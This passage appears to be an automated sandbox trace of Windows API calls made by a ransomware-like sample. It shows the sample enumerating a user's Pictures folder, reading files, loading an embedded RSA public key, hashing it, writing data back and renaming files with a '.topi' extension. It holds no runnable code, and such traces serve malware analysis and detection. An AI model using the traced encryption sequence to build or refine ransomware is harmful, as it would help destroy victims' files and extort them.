| out: hHeap=0x680000) returned 1 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9570 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1de8 | out: hHeap=0x680000) returned 1 [0095.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.561] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x18d89, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x18d89, lpOverlapped=0x0) returned 1 [0095.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.562] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18d8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.562] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.562] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.562] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.562] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.562] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.563] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.563] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.563] CloseHandle (hObject=0x6a8) returned 1 [0095.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.564] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ifqNKr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ifqnkr.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ifqNKr.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ifqnkr.png.topi")) returned 1 [0095.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.565] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.567] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa4ef0f0, ftCreationTime.dwHighDateTime=0x1d5b728, ftLastAccessTime.dwLowDateTime=0x14cb3170, ftLastAccessTime.dwHighDateTime=0x1d5b821, ftLastWriteTime.dwLowDateTime=0x14cb3170, ftLastWriteTime.dwHighDateTime=0x1d5b821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IK1V", cAlternateFileName="")) returned 1 [0095.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0095.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.567] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x395f0a20, ftCreationTime.dwHighDateTime=0x1d5ba1f, ftLastAccessTime.dwLowDateTime=0xbebf5d10, ftLastAccessTime.dwHighDateTime=0x1d5b6d1, ftLastWriteTime.dwLowDateTime=0xbebf5d10, ftLastWriteTime.dwHighDateTime=0x1d5b6d1, nFileSizeHigh=0x0, nFileSizeLow=0xd056, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsesP.png", cAlternateFileName="")) returned 1 [0095.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.567] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jsesP.png") returned=".png" [0095.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jsesP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jsesp.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.567] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=53334) returned 1 [0095.567] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.570] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.570] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.571] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.571] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.571] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd056, lpOverlapped=0x0) returned 1 [0095.572] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.572] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.572] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.572] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.573] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.573] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.573] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.573] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.573] GetLastError () returned 0x0 [0095.573] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.573] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.573] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.573] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.573] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd060) returned 0x99f72d8 [0095.574] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1de8 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1e30 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9570 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9558 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 